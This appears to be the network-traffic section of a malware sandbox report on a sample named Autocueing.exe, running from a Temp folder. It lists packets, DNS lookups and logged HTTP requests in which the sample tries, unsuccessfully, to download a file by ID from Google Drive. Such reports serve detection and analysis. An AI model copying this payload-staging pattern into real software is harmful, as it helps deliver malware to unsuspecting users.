                                                                                                                                                                                    Jan 11, 2025 05:28:55.526797056 CET44350031142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:28:55.526834965 CET50031443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:28:55.527328014 CET44350031142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:28:55.527371883 CET50031443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:03.859355927 CET50038443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:03.859386921 CET44350038142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:03.987495899 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:03.987699986 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:03.987833023 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:03.988507986 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:03.988529921 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:04.648415089 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:04.648497105 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:04.653584957 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:04.653593063 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:04.657572985 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:04.657598019 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.029185057 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.029290915 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:05.029328108 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.029381037 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:05.030585051 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.030673027 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:05.030746937 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.030822992 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:05.067153931 CET50040443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:05.067192078 CET44350040142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.131959915 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:05.132093906 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.132201910 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:05.133367062 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:05.133408070 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.787118912 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.787240028 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:05.787738085 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:05.787745953 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:05.787985086 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:05.787992001 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:06.305800915 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:06.305898905 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:06.305993080 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:06.306041002 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:06.306082964 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:06.306128979 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:06.306194067 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:06.306580067 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:06.306590080 CET44350041142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:06.306606054 CET50041443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:06.435745955 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:06.435787916 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:06.435893059 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:06.436265945 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:06.436289072 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.081235886 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.081391096 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:07.081926107 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:07.081932068 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.082128048 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:07.082133055 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.576524019 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.576683998 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:07.576709986 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.576761961 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:07.577641964 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.577697039 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.577697992 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:07.577764034 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:07.709157944 CET50042443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:07.709197044 CET44350042142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.742152929 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:07.742213011 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:07.742384911 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:07.743016005 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:07.743031979 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.396672010 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.396792889 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.397262096 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.397269964 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.397471905 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.397478104 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840023994 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840179920 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840198994 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840229988 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840267897 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840311050 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840325117 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840415001 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840476036 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840925932 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840950012 CET44350043142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.840960026 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.841007948 CET50043443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:08.966305971 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:08.966355085 CET44350044142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:08.966460943 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:08.966792107 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:08.966808081 CET44350044142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:09.624285936 CET44350044142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:09.624373913 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:09.624785900 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:09.624797106 CET44350044142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:09.624980927 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:09.624985933 CET44350044142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:10.004240036 CET44350044142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:10.004319906 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:10.004343987 CET44350044142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:10.004386902 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:10.004487038 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:10.004574060 CET44350044142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:10.004637003 CET50044443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:10.013216972 CET50045443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:10.013247013 CET44350045142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:10.013304949 CET50045443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:10.014113903 CET50045443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:10.014132023 CET44350045142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:17.806248903 CET50051443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:17.806296110 CET50051443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:17.935193062 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:17.935261011 CET44350052142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:17.935376883 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:17.935708046 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:17.935728073 CET44350052142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:18.594204903 CET44350052142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:18.594297886 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:18.594727993 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:18.594739914 CET44350052142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:18.594904900 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:18.594911098 CET44350052142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:18.983700991 CET44350052142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:18.983772993 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:18.983807087 CET44350052142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:18.983853102 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:18.983989000 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:18.984025955 CET44350052142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:18.984087944 CET50052443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:19.000010967 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:19.000052929 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:19.000121117 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:19.000406027 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:19.000422001 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:19.657962084 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:19.661166906 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:19.661503077 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:19.661515951 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:19.661679983 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:19.661685944 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082217932 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082304001 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082370043 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082401037 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082453966 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082453966 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:20.082987070 CET50053443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:20.083005905 CET44350053142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.200793982 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.200851917 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.200989962 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.201328993 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.201347113 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.850526094 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.850735903 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.851262093 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.851475000 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.853377104 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.853405952 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.853710890 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:20.853782892 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.854269981 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:20.895334005 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.244891882 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245198965 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245225906 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245277882 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245342970 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245418072 CET44350054142.250.185.142192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.245476961 CET50054443192.168.2.6142.250.185.142
                                                                                                                                                                                    Jan 11, 2025 05:29:21.257843971 CET50055443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:21.257886887 CET44350055142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.257966995 CET50055443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:21.258182049 CET50055443192.168.2.6142.250.185.129
                                                                                                                                                                                    Jan 11, 2025 05:29:21.258193970 CET44350055142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.903542995 CET44350055142.250.185.129192.168.2.6
                                                                                                                                                                                    Jan 11, 2025 05:29:21.903696060 CET50055443192.168.2.6142.250.185.129
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 05:27:59.196892977 CET | 58527 | 53 | 192.168.2.6 | 1.1.1.1
Jan 11, 2025 05:27:59.205557108 CET | 53 | 58527 | 1.1.1.1 | 192.168.2.6
Jan 11, 2025 05:28:00.650902987 CET | 61244 | 53 | 192.168.2.6 | 1.1.1.1
Jan 11, 2025 05:28:00.657697916 CET | 53 | 61244 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 05:27:59.196892977 CET | 192.168.2.6 | 1.1.1.1 | 0x49ff | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:28:00.650902987 CET | 192.168.2.6 | 1.1.1.1 | 0xffe3 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 05:27:59.205557108 CET | 1.1.1.1 | 192.168.2.6 | 0x49ff | No error (0) | drive.google.com | | 142.250.185.142 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:28:00.657697916 CET | 1.1.1.1 | 192.168.2.6 | 0xffe3 | No error (0) | drive.usercontent.google.com | | 142.250.185.129 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49942 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:00 UTC | 216 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: drive.google.com
Cache-Control: no-cache
2025-01-11 04:28:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 11 Jan 2025 04:28:00 GMT
Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'nonce-qO4-8CDa-5ag8Bj84718Yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49948 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:01 UTC | 258 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2025-01-11 04:28:01 UTC | 2218 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFIdbgQ5tTtxm5wj5DTEv-Nv4jj0VPWutfKq_Jo0teQ30BwXGcVOHnb3buB5hgoMcqA9Ymfn
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 11 Jan 2025 04:28:01 GMT
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-3bPcayjmvUMClbpbEpuo0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Set-Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4; expires=Sun, 13-Jul-2025 04:28:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:28:01 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jNHsa1XMKWINKmvCbqY3OA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49956 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:28:02 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:28:03 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:02 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-ppwQ0kynFjLAo3PBTkIRag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
